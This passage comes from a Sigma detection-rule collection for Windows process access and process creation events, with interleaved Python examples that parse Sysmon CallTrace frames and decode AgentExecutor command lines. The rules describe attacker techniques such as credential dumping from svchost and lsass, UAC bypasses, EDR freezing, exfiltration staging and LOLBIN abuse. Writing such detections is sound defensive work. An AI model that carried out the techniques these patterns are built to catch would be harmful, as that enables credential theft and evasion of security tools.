Microsoft-Windows-Kernel-Audit-API-Calls provider\n        Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls'\n    filter_optional_vmware:\n        TargetImage|endswith: ':\\Windows\\system32\\systeminfo.exe'\n        SourceImage|endswith: 'setup64.exe' # vmware\n    filter_optional_cylance:\n        SourceImage|endswith: ':\\Windows\\Explorer.EXE'\n        TargetImage|endswith: ':\\Program Files\\Cylance\\Desktop\\CylanceUI.exe'\n    filter_optional_amazon:\n        SourceImage|endswith: 'AmazonSSMAgentSetup.exe'\n        TargetImage|endswith: 'AmazonSSMAgentSetup.exe'\n    filter_optional_vscode: # VsCode\n        SourceImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n    filter_optional_teams: # MS Teams\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_optional_discord: # Discord\n        TargetImage|contains: '\\AppData\\Local\\Discord\\'\n        TargetImage|endswith: '\\Discord.exe'\n    filter_optional_yammer:\n        SourceImage|contains: '\\AppData\\Local\\yammerdesktop\\app-'\n        SourceImage|endswith: '\\Yammer.exe'\n        TargetImage|contains: '\\AppData\\Local\\yammerdesktop\\app-'\n        TargetImage|endswith: '\\Yammer.exe'\n        GrantedAccess: '0x1000'\n    filter_optional_evernote:\n        TargetImage|endswith: '\\Evernote\\Evernote.exe'\n    filter_optional_adobe_acrobat:\n        SourceImage|contains: ':\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\'\n        SourceImage|endswith: '\\AcroCEF.exe'\n        TargetImage|contains: ':\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\'\n        TargetImage|endswith: '\\AcroCEF.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
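The direct-syscall rule above is unusual in that its whole selection is the first frame of the Sysmon CallTrace, and everything else is a chain of suppression filters. The following is an added example, written for this page and not code from the Sigma project, that parses CallTrace strings into frames and evaluates the rule's `selection and not 1 of filter_main_* and not 1 of filter_optional_*` condition over constructed Event ID 10 records, reporting which filter suppressed each event. The frame format (module plus hex offset, or `UNKNOWN(address)` for a return address with no backing image, joined by `|`) is how Sysmon renders the field; only the generic, kernel-trace and VS Code filters are reproduced, and every event, path and address below is invented.

```python
"""Added example (not the Sigma project's code): parse Sysmon CallTrace frames
and evaluate the NtOpenProcess direct-syscall rule with its filter chain."""

import re
from dataclasses import dataclass
from typing import Optional

FRAME_RE = re.compile(
    r"^(?:(?P<module>.+?)\+(?P<offset>[0-9A-Fa-f]+)|UNKNOWN\((?P<addr>[0-9A-Fa-f]+)\))$"
)
TRUSTED_DIRS = (":\\program files (x86)\\", ":\\program files\\", ":\\windows\\system32\\",
                ":\\windows\\syswow64\\", ":\\windows\\winsxs\\")
VSCODE = "\\appdata\\local\\programs\\microsoft vs code\\code.exe"
KERNEL_AUDIT_PROVIDER = "Microsoft-Windows-Kernel-Audit-API-Calls"


@dataclass(frozen=True)
class Frame:
    module: Optional[str]   # None: return address is not backed by a loaded image
    address: int            # offset into the module, or the raw address for UNKNOWN


def parse_call_trace(trace: str) -> list[Frame]:
    frames = []
    for raw in trace.split("|"):
        m = FRAME_RE.match(raw.strip())
        if m is None:
            raise ValueError(f"unrecognised CallTrace frame: {raw!r}")
        if m.group("addr") is not None:
            frames.append(Frame(None, int(m.group("addr"), 16)))
        else:
            frames.append(Frame(m.group("module"), int(m.group("offset"), 16)))
    return frames


def evaluate_direct_syscall_rule(event: dict) -> tuple[bool, str]:
    """(fires, reason) for: selection and not 1 of filter_main_* and not 1 of filter_optional_*."""
    frames = parse_call_trace(event["CallTrace"])
    # selection: CallTrace|startswith 'UNKNOWN'. A call that went through ntdll's
    # stub has ntdll.dll as its innermost frame; a syscall issued from shellcode or a
    # manually mapped module leaves an unbacked address there instead.
    if frames[0].module is not None:
        return False, f"selection: innermost frame is {frames[0].module}"
    if event.get("Provider_Name") == KERNEL_AUDIT_PROVIDER:
        return False, "filter_main_kerneltrace_edge"
    src = event.get("SourceImage", "").lower()
    tgt = event.get("TargetImage", "").lower()
    if any(d in src for d in TRUSTED_DIRS) and any(d in tgt for d in TRUSTED_DIRS):
        return False, "filter_main_generic"
    if src.endswith(VSCODE) and tgt.endswith(VSCODE):
        return False, "filter_optional_vscode"
    return True, "direct syscall candidate"


def run_direct_syscall_rule(events: list[dict]) -> list[str]:
    return [e["id"] for e in events if evaluate_direct_syscall_rule(e)[0]]


# Constructed Sysmon EID 10 records; offsets and addresses are invented.
NTDLL = "C:\\Windows\\SYSTEM32\\ntdll.dll+526b1"
CODE_EXE = "C:\\Users\\bob\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
EVENTS = [
    {"id": "beacon", "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe",
     "CallTrace": "UNKNOWN(000001C4A2B3C0F5)|UNKNOWN(000001C4A2B3D123)|"
                  "C:\\Windows\\System32\\KERNEL32.DLL+17344|" + NTDLL},
    {"id": "normal", "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d5e4|C:\\Windows\\System32\\KERNELBASE.dll+2a2fa|"
                  "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe+1a2b"},
    {"id": "systeminfo", "SourceImage": "C:\\Windows\\System32\\systeminfo.exe",
     "TargetImage": "C:\\Windows\\System32\\svchost.exe",
     "CallTrace": "UNKNOWN(00007FFB12345678)|" + NTDLL},
    {"id": "kernel-audit", "SourceImage": "C:\\Users\\bob\\Desktop\\tool.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe",
     "Provider_Name": KERNEL_AUDIT_PROVIDER, "CallTrace": "UNKNOWN(19290435374)"},
    {"id": "vscode", "SourceImage": CODE_EXE, "TargetImage": CODE_EXE,
     "CallTrace": "UNKNOWN(00007FF6AABBCCDD)|" + NTDLL},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["id"], evaluate_direct_syscall_rule(e))
```

The "kernel-audit" record shows why `filter_main_kerneltrace_edge` exists: the Kernel-Audit-API-Calls provider emits a single `UNKNOWN(...)` frame for every call, so without that filter the selection would fire on all of its events. The same parser also reads the `UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|` prefix the WOW64 logger rule below keys on, as two frames with address zero.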
  {
    "path": "rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml",
    "content": "title: Credential Dumping Attempt Via Svchost\nid: 174afcfa-6e40-4ae9-af64-496546389294\nstatus: test\ndescription: Detects when a process tries to access the memory of svchost to potentially dump credentials.\nreferences:\n    - Internal Research\nauthor: Florent Labouyrie\ndate: 2021-04-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    selection:\n        TargetImage|endswith: '\\svchost.exe'\n        GrantedAccess: '0x143a'\n    filter_main_known_processes:\n        SourceImage|endswith:\n            - '\\services.exe'\n            - '\\msiexec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml",
    "content": "title: Suspicious Svchost Process Access\nid: 166e9c50-8cd9-44af-815d-d1f0c0e90dde\nstatus: test\ndescription: Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.\nreferences:\n    - https://github.com/hlldz/Invoke-Phant0m\n    - https://twitter.com/timbmsft/status/900724491076214784\nauthor: Tim Burrell\ndate: 2020-01-02\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: ':\\Windows\\System32\\svchost.exe'\n        GrantedAccess: '0x1F3FFF'\n        CallTrace|contains: 'UNKNOWN'\n    filter_main_msbuild:\n        SourceImage|contains: ':\\Program Files\\Microsoft Visual Studio\\'\n        SourceImage|endswith: '\\MSBuild\\Current\\Bin\\MSBuild.exe'\n        # Just to make sure it's \"really\" .NET :)\n        CallTrace|contains:\n            - 'Microsoft.Build.ni.dll'\n            - 'System.ni.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml",
    "content": "title: Function Call From Undocumented COM Interface EditionUpgradeManager\nid: fb3722e4-1a06-46b6-b772-253e2e7db933\nstatus: test\ndescription: Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.\nreferences:\n    - https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/\n    - https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-07\nmodified: 2023-11-30\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|contains: 'editionupgrademanagerobj.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml",
    "content": "title: UAC Bypass Using WOW64 Logger DLL Hijack\nid: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|contains: ':\\Windows\\SysWOW64\\'\n        GrantedAccess: '0x1fffff'\n        CallTrace|startswith: 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access.yml",
    "content": "title: Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze\nid: 387df17d-3b04-448f-8669-9e7fd5e5fd8c\nrelated:\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      type: similar\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects process access events where WerFaultSecure accesses MsMpEng.exe with dbgcore.dll or dbghelp.dll in the call trace, indicating potential EDR freeze techniques.\n    This technique leverages WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to call MiniDumpWriteDump and suspend EDR/AV processes, allowing malicious activity to execute undetected during the suspension period.\nreferences:\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\n    definition: |\n        Requires Sysmon Event ID 10 (ProcessAccess) with CallTrace enabled.\n        Example sysmon config snippet with grouping, as logging individual ProcessAccess events can generate excessive logs:\n        <ProcessAccess onmatch=\"include\">\n            <Rule groupRelation=\"and\">\n            <TargetImage condition=\"end with\">\\MsMpEng.exe</TargetImage>\n            <SourceImage condition=\"end with\">\\WerFaultSecure.exe</SourceImage>\n            </Rule>\n        </ProcessAccess>\ndetection:\n    selection:\n        SourceImage|endswith: '\\WerFaultSecure.exe'\n        TargetImage|endswith: '\\MsMpEng.exe'\n        CallTrace|contains:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate Windows Error Reporting operations\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_access/proc_access_win_werfaultsecure_msmpeng_access/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml",
    "content": "title: 7Zip Compressing Dump Files\nid: ec570e53-4c76-45a9-804d-dc3f355ff7a7\nrelated:\n    - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc\n      type: derived\nstatus: test\ndescription: Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2023-09-12\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_extension:\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally\n    - Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml",
    "content": "title: Compress Data and Lock With Password for Exfiltration With 7-ZIP\nid: 9fbf5927-5261-4284-a71d-f681029ea574\nstatus: test\ndescription: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2023-03-13\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_password:\n        CommandLine|contains: ' -p'\n    selection_action:\n        CommandLine|contains:\n            - ' a '\n            - ' u '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity is expected since compressing files with a password is common.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_acccheckconsole_execution.yml",
    "content": "title: Potential DLL Injection Via AccCheckConsole\nid: 0f6da907-5854-4be6-859a-e9958747b0aa\nstatus: test\ndescription: |\n    Detects the execution of \"AccCheckConsole\", a command-line tool for verifying the accessibility implementation of an application's UI.\n    One of the tests that this checker can run is called a \"verification routine\", which tests for things like Consistency, Navigation, etc.\n    The tool allows a user to provide a DLL that contains a custom \"verification routine\". An attacker can build such a DLL and pass it via the CLI, after which it is loaded in the context of the \"AccCheckConsole\" utility.\nreferences:\n    - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340\n    - https://twitter.com/bohops/status/1477717351017680899?s=12\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-06\nmodified: 2024-08-29\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AccCheckConsole.exe'\n        - OriginalFileName: 'AccCheckConsole.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -hwnd'\n            - ' -process '\n            - ' -window '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the UI Accessibility Checker\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml",
    "content": "title: Suspicious AddinUtil.EXE CommandLine Execution\nid: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8\nstatus: test\ndescription: |\n    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    selection_susp_1_flags:\n        CommandLine|contains:\n            - '-AddInRoot:'\n            - '-PipelineRoot:'\n    selection_susp_1_paths:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    selection_susp_2:\n        CommandLine|contains:\n            - '-AddInRoot:.'\n            - '-AddInRoot:\".\"'\n            - '-PipelineRoot:.'\n            - '-PipelineRoot:\".\"'\n        CurrentDirectory|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    condition: selection_img and (all of selection_susp_1_* or selection_susp_2)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of AddinUtil.EXE\nid: b5746143-59d6-4603-8d06-acbd60e166ee\nstatus: test\ndescription: |\n    Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\addinutil.exe'\n    filter_main_werfault:\n        Image|endswith:\n            - ':\\Windows\\System32\\conhost.exe'\n            - ':\\Windows\\System32\\werfault.exe'\n            - ':\\Windows\\SysWOW64\\werfault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml",
    "content": "title: Uncommon AddinUtil.EXE CommandLine Execution\nid: 4f2cd9b6-4a17-440f-bb2a-687abb65993a\nstatus: test\ndescription: |\n    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '-AddInRoot:'\n            - '-PipelineRoot:'\n    filter_main_addinroot:\n        CommandLine|contains:\n            - '-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n            - '-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml",
    "content": "title: AddinUtil.EXE Execution From Uncommon Directory\nid: 6120ac2a-a34b-42c0-a9bd-1fb9f459f348\nstatus: test\ndescription: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\nmodified: 2025-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\addinutil.exe'\n        - OriginalFileName: 'AddInUtil.exe'\n    filter_main_legit_location:\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - ':\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml",
    "content": "title: Potential Adplus.EXE Abuse\nid: 2f869d59-7f6a-4931-992c-cce556ff2d53\nstatus: test\ndescription: Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\n    - https://twitter.com/nas_bench/status/1534916659676422152\n    - https://twitter.com/nas_bench/status/1534915321856917506\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\nmodified: 2023-06-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\adplus.exe'\n        - OriginalFileName: 'Adplus.exe'\n    selection_cli:\n        CommandLine|contains:\n            # Dump process memory\n            - ' -hang '\n            - ' -pn '\n            - ' -pmn '\n            - ' -p '\n            - ' -po '\n            # Using a config file\n            - ' -c '\n            # Execute commands inline\n            - ' -sc '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of Adplus for debugging purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml",
    "content": "title: AgentExecutor PowerShell Execution\nid: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61\nrelated:\n    - id: c0b40568-b1e9-4b03-8d6c-b096da6da9ab\n      type: similar\nstatus: test\ndescription: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument\nauthor: Nasreddine Bencherchali (Nextron Systems), memory-shards\nreferences:\n    - https://twitter.com/lefterispan/status/1286259016436514816\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\n    - https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\n    - https://twitter.com/jseerden/status/1247985304667066373/photo/1\ndate: 2022-12-24\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AgentExecutor.exe'\n        - OriginalFileName: 'AgentExecutor.exe'\n    selection_cli:\n        # Example:\n        #   AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64]\n        # Note:\n        #   - If [timeoutSeconds] is NULL then it defaults to 60000\n        #   - If [enforceSignatureCheck] is:\n        #       - \"NULL\" or \"1\" then a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy allsigned -file \"\n        #       - Else a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy bypass -file \"\n        #   - [powershellPath] is always concatenated to \"powershell.exe\"\n        CommandLine|contains:\n            - ' -powershell' # Also covers the \"-powershellDetection\" flag\n            - ' -remediationScript'\n    filter_main_intune:\n        ParentImage|endswith: '\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use via Intune management. Exclude known script paths and names to reduce the FP rate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml",
    "content": "title: Suspicious AgentExecutor PowerShell Execution\nid: c0b40568-b1e9-4b03-8d6c-b096da6da9ab\nrelated:\n    - id: 7efd2c8d-8b18-45b7-947d-adfe9ed04f61\n      type: similar\nstatus: test\ndescription: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument\nauthor: Nasreddine Bencherchali (Nextron Systems), memory-shards\nreferences:\n    - https://twitter.com/lefterispan/status/1286259016436514816\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\n    - https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\n    - https://twitter.com/jseerden/status/1247985304667066373/photo/1\ndate: 2022-12-24\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\AgentExecutor.exe'\n        - OriginalFileName: 'AgentExecutor.exe'\n    selection_cli:\n        # Example:\n        #   AgentExecutor.exe -powershell [scriptPath] [outputFilePath] [errorFilePath] [timeoutFilePath] [timeoutSeconds] [powershellPath] [enforceSignatureCheck] [runAs32BitOn64]\n        # Note:\n        #   - If [timeoutSeconds] is NULL then it defaults to 60000\n        #   - If [enforceSignatureCheck] is:\n        #       - \"NULL\" or \"1\" then a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy allsigned -file \"\n        #       - Else a PowerShell instance is spawned with the args: \"-NoProfile -executionPolicy bypass -file \"\n        #   - [powershellPath] is always concatenated to \"powershell.exe\"\n        CommandLine|contains:\n            - ' -powershell' # Also covers the \"-powershellDetection\" flag\n            - ' -remediationScript'\n    filter_main_pwsh:\n        CommandLine|contains:\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\'\n    filter_main_intune:\n        ParentImage|endswith: '\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
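Both AgentExecutor rules carry the same comment block describing how the tool turns its positional arguments into a PowerShell invocation, and the "Suspicious" variant fires precisely when the sixth argument, [powershellPath], points somewhere other than the two WindowsPowerShell\v1.0 directories. The following is an added example, written for this page and not code from the Sigma project or from Intune, that decodes an `AgentExecutor.exe -powershell` command line using those documented semantics (NULL timeout defaults to 60000; NULL or "1" for enforceSignatureCheck gives allsigned, anything else bypass; powershellPath is always concatenated with "powershell.exe") and then applies the rule's two filters. Treating a missing or empty argument as the comment's "NULL" is my reading of it; the command lines, staging paths and parent images are constructed, and only the `-powershell` form is handled, not `-remediationScript`.

```python
"""Added example (not the Sigma project's or Intune's code): decode an
AgentExecutor -powershell command line and mirror the 'Suspicious' rule."""

import shlex
from typing import Optional

ALLOWED_PWSH_DIRS = (  # filter_main_pwsh, lower-cased for case-insensitive matching
    "c:\\windows\\system32\\windowspowershell\\v1.0\\",
    "c:\\windows\\syswow64\\windowspowershell\\v1.0\\",
)
INTUNE_AGENT = "\\microsoft.management.services.intunewindowsagent.exe"  # filter_main_intune
FIELDS = ("scriptPath", "outputFilePath", "errorFilePath", "timeoutFilePath",
          "timeoutSeconds", "powershellPath", "enforceSignatureCheck", "runAs32BitOn64")


def split_windows_cmdline(cmdline: str) -> list[str]:
    """Tokenise the simple quoted forms used here: non-POSIX shlex keeps
    backslashes literal, and surrounding double quotes are stripped."""
    return [t[1:-1] if len(t) >= 2 and t[0] == '"' and t[-1] == '"' else t
            for t in shlex.split(cmdline, posix=False)]


def decode_agentexecutor(cmdline: str) -> Optional[dict]:
    """Effective PowerShell invocation for an 'AgentExecutor.exe -powershell ...'
    line, or None when the line is not that form."""
    argv = split_windows_cmdline(cmdline)
    if len(argv) < 2 or argv[1].lower() != "-powershell":
        return None
    positional = argv[2:]

    def arg(i: int) -> Optional[str]:  # absent or empty argument -> NULL (assumption)
        return positional[i] if i < len(positional) and positional[i] else None

    fields = {name: arg(i) for i, name in enumerate(FIELDS)}
    timeout = fields["timeoutSeconds"] or "60000"            # NULL defaults to 60000
    signed = fields["enforceSignatureCheck"] in (None, "1")  # NULL or "1" -> allsigned
    policy = "allsigned" if signed else "bypass"
    pwsh_dir = fields["powershellPath"] or ""
    powershell = pwsh_dir + "powershell.exe"                 # always concatenated
    return {
        "script": fields["scriptPath"],
        "timeout_seconds": int(timeout),
        "powershell": powershell,
        "arguments": f"-NoProfile -executionPolicy {policy} -file {fields['scriptPath']}",
        "pwsh_outside_windows_dirs": not pwsh_dir.lower().startswith(ALLOWED_PWSH_DIRS),
    }


def suspicious_agentexecutor(cmdline: str, parent_image: str) -> bool:
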